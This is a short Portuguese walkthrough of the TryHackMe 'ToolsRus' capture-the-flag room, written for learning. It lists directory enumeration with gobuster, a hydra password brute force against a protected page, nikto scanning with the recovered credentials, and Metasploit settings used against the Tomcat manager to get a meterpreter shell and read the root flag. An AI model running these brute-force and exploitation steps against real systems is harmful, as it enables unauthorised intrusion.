Alooow!
Este é o meu primeiro roteiro do THM e o desafio foi o ToolsRus Vou compartilhar o meu caminho..
Usei as seguintes ferramentas
-dirbuster
-hydra
-nmap
-nikto
-metasploit
Identificamos um servidor apache na porta 80 e curiosamente um Tomcat na porta 1234
Aplicamos o gobuster
gobuster dir -u http://10.10.139.47/ -w /usr/share/dirb/wordlists/common.txt
No diretório /guidelines encontramos o nome bob
Na porta 1234 encontramos o Tomcat como esperado
No diretório /protected identificamos a requisição de login e senha
Ja que identifiquei a porta 1234 vamos rodar um gobuster pra identificar novos diretórios
gobuster dir -u http://10.10.139.47:1234/ -w /usr/share/dirb/wordlists/common.txt
Com a página de login encontrada vamos tentar quebrar a senha com o hydra usando o usuário bob que identificamos mais acima
hydra -l bob -P /usr/share/wordlists/rockyou.txt 10.10.139.47 http-get /protected
Aqui encontramos login e senha Com essas credenciais conseguimos autenticar no Tomcat manager
Essas credenciais não são suficientes ainda para logar via SSH.
nikto -id bob:bubbles -h http://10.10.139.47:1234/manager/
Nos traz algumas paginas para analisar..
Com um possivel usuario bob
e uma tela de login podemos fazer uma forcinha bruta e tentar descobrir a senha...
-set RHOST $IPDESTINO
-set RPORT 1234
-set httpusername bob
-set httppasword *****
-run
O meterpreter nos dar poder para enviar comandos para a máquina
Dentro de /root/ conseguimos ler a flag.txt
cat /root/flag.txt
Com a flag e root finalizo esta sala!
[]`s